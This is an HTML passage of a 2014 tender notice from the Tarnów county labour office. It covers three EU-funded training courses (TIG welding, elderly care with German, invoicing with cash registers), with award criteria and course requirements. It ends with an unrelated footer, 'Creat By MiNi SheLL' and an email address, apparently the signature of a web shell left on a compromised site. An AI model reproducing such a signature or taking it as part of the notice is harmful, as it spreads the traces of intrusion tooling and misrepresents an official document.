<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.80</li>
<li>2 - Efektywność/współpraca(wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.10</li>
<li>3 - Certyfikat jakości usług - 0.10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, 
na podstawie której dokonano wyboru w następujący sposób:
1) w uzasadnionych przypadkach, za zgodą Zamawiającego, dopuszcza się zmianę kadry prowadzącej szkolenie - pod warunkiem, że proponowana kadra będzie spełniała warunki opisane w niniejszej specyfikacji. Informacja o zmianie musi wpłynąć do Zamawiającego 
na piśmie, na co najmniej jeden dzień przed zaistniałą okolicznością; 
2) w uzasadnionych przypadkach, za zgodą Zamawiającego, dopuszcza się zmianę miejsca prowadzenia szkolenia. Informacja o zmianie musi wpłynąć do Zamawiającego na piśmie 
co najmniej 5 dni roboczych przed rozpoczęciem szkolenia. W przypadku nagłych zdarzeń losowych termin ten nie musi być zachowany. Informacja musi wpłynąć na piśmie 
do Zamawiającego niezwłocznie po zaistniałym zdarzeniu;
3) w uzasadnionych przypadkach za zgodą Wykonawcy Zamawiający może zmienić termin rozpoczęcia i zakończenia szkolenia, przy czym warunki dotyczące tygodniowego wymiaru godzin oraz okresu realizacji zamówienia nie mogą ulec zmianie;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 33-100 Tarnów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2014 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Tarnowie, pl.  gen. J. Bema 3, sekretariat (pok. 214).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie realizowane jest w ramach projektu Czas na pracę współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia pn. Spawanie blach 
i rur spoinami pachwinowymi metodą TIG (141) dla 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Spawanie blach 
i rur spoinami pachwinowymi metodą TIG (141) dla 10 osób,
2) szkolenie realizowane jest w ramach projektu Czas na pracę współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,
3) szkolenie musi zostać przeprowadzone zgodnie z wytycznymi Instytutu Spawalnictwa 
w Gliwicach,
4) przy jednym stanowisku praktycznej nauki zawodu mogą pracować maksymalnie 2 osoby,
5) absolwent szkolenia otrzymuje: 
- zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie; zaświadczenie musi być oznaczone logo projektu (zawierające: logotyp PO KL, logotyp Unii Europejskiej, hasło promocyjne zarezerwowane dla Programu Kapitał Ludzki Człowiek najlepsza inwestycja, informacje o projekcie, w ramach którego prowadzone będzie szkolenie, a także informacje dotyczące współfinansowania projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego; oznaczenie musi być zgodne  z wytycznymi dotyczącymi oznaczania projektów w ramach PO KL oraz Planem Komunikacji PO KL; wytyczne jak i Plan Komunikacji dostępne są na stronie internetowej www.pokl.wup-krakow.pl),
- książkę spawacza,
- świadectwo egzaminu kwalifikacyjnego spawacza,
6) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
7) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
8) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
9) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
10) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 29.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia pn. Opiekun osób starszych i chorych z elementami rehabilitacji oraz nauką języka niemieckiego dla 10 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Opiekun osób starszych i chorych z elementami rehabilitacji oraz nauką języka niemieckiego dla 10 osób,
2) szkolenie realizowane jest w ramach projektu Czas na pracę współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,
3) szkolenie winno obejmować minimum 300 godzin zegarowych zajęć, w tym:
- minimum 200 godzin zegarowych zajęć z zakresu opieki nad osobą starszą i chorą z elementami rehabilitacji, z czego minimum 140 godzin to zajęcia praktyczne,
- minimum 100 godzin zegarowych zajęć z zakresu nauki języka niemieckiego,
4) program szkolenia winien obejmować w szczególności zagadnienia z zakresu:
- pedagogiki specjalnej,
- gerontologii,
- zasad etyczno - moralnych,
- udzielania pierwszej pomocy w sytuacji zagrożenia życia lub określonej niedyspozycji,
- podstawowych czynności pielęgnacyjno - higienicznych,
- utrzymania czystości w otoczeniu podopiecznego,
- technik wykonywania podstawowych zabiegów rehabilitacyjnych,
- stosowania wybranych form terapii zajęciowej i organizowania zajęć rekreacyjnych podopiecznych,
- nauki języka niemieckiego (od podstaw) z uwzględnieniem słownictwa zgodnego z zakresem szkolenia,
5) uczestnicy winni otrzymać na własność książkę oraz ćwiczenia do nauki języka niemieckiego (od podstaw),
6) zajęcia winny być realizowane w systemie: 2 godziny zajęć z języka niemieckiego i 4 godziny zajęć w ramach opieki nad osobą starszą i chorą (Zamawiający dopuszcza możliwość zmiany realizowanych zajęć tylko w uzasadnionych przypadkach),
7) absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji, tematy 
i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie; zaświadczenie musi być oznaczone logo projektu (zawierające: logotyp PO KL, logotyp Unii Europejskiej, hasło promocyjne zarezerwowane dla Programu Kapitał Ludzki Człowiek najlepsza inwestycja, informacje o projekcie, w ramach którego prowadzone będzie szkolenie, a także informacje dotyczące współfinansowania projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego; oznaczenie musi być zgodne  
z wytycznymi dotyczącymi oznaczania projektów w ramach PO KL oraz Planem Komunikacji PO KL; wytyczne jak i Plan Komunikacji dostępne są na stronie internetowej www.pokl.wup-krakow.pl),
8) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
9) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
10) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
11) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
12) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 78.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia pn. Fakturzysta 
z obsługą kasy fiskalnej dla 10 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Fakturzysta 
z obsługą kasy fiskalnej dla 10 osób,
2) szkolenie realizowane jest w ramach projektu Czas na pracę współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,
3) szkolenie winno obejmować minimum 80 godzin zegarowych zajęć, w tym minimum 65 godzin zajęć praktycznych
4) program szkolenia winien obejmować w szczególności:
- podstawowe wiadomości dotyczące sprzedaży,
- podstawy obsługi komputera,
- obsługę programu do fakturowania,
- wystawianie faktur i paragonów,
- podstawy towaroznawstwa,
- dokumentację handlową i magazynową,
- obsługę kasy fiskalnej,
- obsługę terminala kart płatniczych,
5) liczba uczestników szkolenia przypadająca na jedno stanowisko praktycznej nauki zawodu wynosi 1 osoba (tj. każda osoba uczestnicząca w szkoleniu musi posiadać do dyspozycji 1 kasę fiskalną oraz 1 stanowisko komputerowe z odpowiednim oprogramowaniem niezbędnym 
do przeprowadzenia szkolenia),
6) absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub inny dokumentu potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji, tematy 
i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie; zaświadczenie musi być oznaczone logo projektu (zawierające: logotyp PO KL, logotyp Unii Europejskiej, hasło promocyjne zarezerwowane dla Programu Kapitał Ludzki Człowiek najlepsza inwestycja, informacje o projekcie, w ramach którego prowadzone będzie szkolenie, a także informacje dotyczące współfinansowania projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego; oznaczenie musi być zgodne  
z wytycznymi dotyczącymi oznaczania projektów w ramach PO KL oraz Planem Komunikacji PO KL; wytyczne jak i Plan Komunikacji dostępne są na stronie internetowej www.pokl.wup-krakow.pl),
7) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
8) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
9) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
10) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
11) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 22.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com